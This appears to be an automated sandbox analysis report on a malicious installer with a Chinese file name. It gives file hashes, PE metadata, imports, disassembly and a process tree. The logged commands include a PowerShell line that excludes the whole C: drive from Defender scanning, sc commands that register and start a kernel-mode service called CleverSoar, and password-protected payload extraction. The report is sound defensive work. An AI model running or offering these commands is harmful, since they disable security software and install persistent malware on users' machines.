                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.5305591301859165
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:833E148BCEB71E3D12C96B53539F24E1
                          SHA1:C7DCDF06DC1045595F9F914C822E04ECBA7ADB6F
                          SHA-256:FE66E967480D9E0A1D307B21F310D6AF3C00789F680CE8E21ABD2AEE8F1C565A
                          SHA-512:F6E9E5C7B63E301AE5F8CE22F61247581DA00C0119615014740EAB272CDBC75B1BBC995F9A6905C8A087679AB8DBBDF47560C78F3FEE8873B1390791A66D9BA2
                          Malicious:true
                          Antivirus:
                          • Antivirus: Virustotal, Detection: 1%, Browse
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Process:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.5305591301859165
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:833E148BCEB71E3D12C96B53539F24E1
                          SHA1:C7DCDF06DC1045595F9F914C822E04ECBA7ADB6F
                          SHA-256:FE66E967480D9E0A1D307B21F310D6AF3C00789F680CE8E21ABD2AEE8F1C565A
                          SHA-512:F6E9E5C7B63E301AE5F8CE22F61247581DA00C0119615014740EAB272CDBC75B1BBC995F9A6905C8A087679AB8DBBDF47560C78F3FEE8873B1390791A66D9BA2
                          Malicious:true
                          Process:C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Process:C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3621376
                          Entropy (8bit):7.006090025798393
                          Encrypted:false
                          SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                          MD5:FCADEAE28FCC52FD286350DFEECD82E5
                          SHA1:48290AA098DEDE53C457FC774063C3198754A161
                          SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                          SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 26%
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946143883607197
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          File size:7'237'925 bytes
                          MD5:704d909b74fde4f05ceba394fc91416b
                          SHA1:e78859d87194b3968f1492e18f93424ccd946d63
                          SHA256:a7e3fad1d01f1888aa10d040699857288d4c6b4dc0e77eb5381e34c5c9e8e4e9
                          SHA512:4791bee70217a33962f563ea424ce586ec2140bb26b0c77572a2f9876695948a3f77512246994673f954d5cfdae7085c483775567175bae01136a5c31f46dabc
                          SSDEEP:98304:XwRE4sdlQNRIvth0lw8pUEkCYNlN6BMy66dmEdlvCOcIoodMwZgq:lPvP0lw8polKMy66nLvCOcIdV
                          TLSH:0C761222F2C7D53EE06D0B3B09B2A15454FBAA656423AE1796ECB4ECCF350501D3E687
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                          Icon Hash:0c0c2d33ceec80aa
                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc
                          Instruction
                          push ebp
                          mov ebp, esp
                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007F33D4DE5105h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007F33D4E76A8Bh
                          call 00007F33D4E765DEh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007F33D4E712B8h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007F33D4DDF1B3h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007F33D4E725E3h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007F33D4E76B13h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007F33D4E7D7FAh
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007F33D4E72ED8h
                          mov edx, dword ptr [004B4200h]
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc | 0xcb000 | 0x11000 | 0x11000 | 338edf3ba219bca78cc4fc4306bc77d8 | False | 0.18772977941176472 | data | 3.7220745010189797 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                          RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                          RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                          RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                          RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                          RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                          RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                          RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                          RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                          RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                          RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                          RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                          RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                          RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                          RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                          RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                          RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                          RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                          RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                          RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                          RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                          RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                          RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                          RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                          RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                          RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                          RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.2045454545454546
                          RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                          RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2754957507082153
                          RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                          DLL | Import
                          kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dll | InitCommonControls
                          user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                          Name | Ordinal | Address
                          __dbk_fcall_wrapper | 2 | 0x40fc10
                          dbkFCallWrapperAddr | 1 | 0x4b063c
                          Language of compilation system | Country where language is spoken
                          English | United States
                          No network behavior found

                          Target ID:0
                          Start time:21:42:26
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
                          Imagebase:0xfd0000
                          File size:7'237'925 bytes
                          MD5 hash:704D909B74FDE4F05CEBA394FC91416B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:21:42:27
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$20442,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe"
                          Imagebase:0x220000
                          File size:3'366'912 bytes
                          MD5 hash:833E148BCEB71E3D12C96B53539F24E1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Antivirus matches:
                          • Detection: 1%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:21:42:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:21:42:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:21:42:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff693ab0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:21:42:35
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
                          Imagebase:0xfd0000
                          File size:7'237'925 bytes
                          MD5 hash:704D909B74FDE4F05CEBA394FC91416B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          Target ID:6
                          Start time:21:42:36
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp" /SL5="$302A6,6283511,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe" /VERYSILENT
                          Imagebase:0x470000
                          File size:3'366'912 bytes
                          MD5 hash:833E148BCEB71E3D12C96B53539F24E1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:7
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0xca0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          • Detection: 0%, Virustotal, Browse
                          Has exited:true

                          Target ID:11
                          Start time:21:42:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:12
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0xca0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:13
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:14
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff74bf50000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:15
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff61c070000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:16
                          Start time:21:42:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
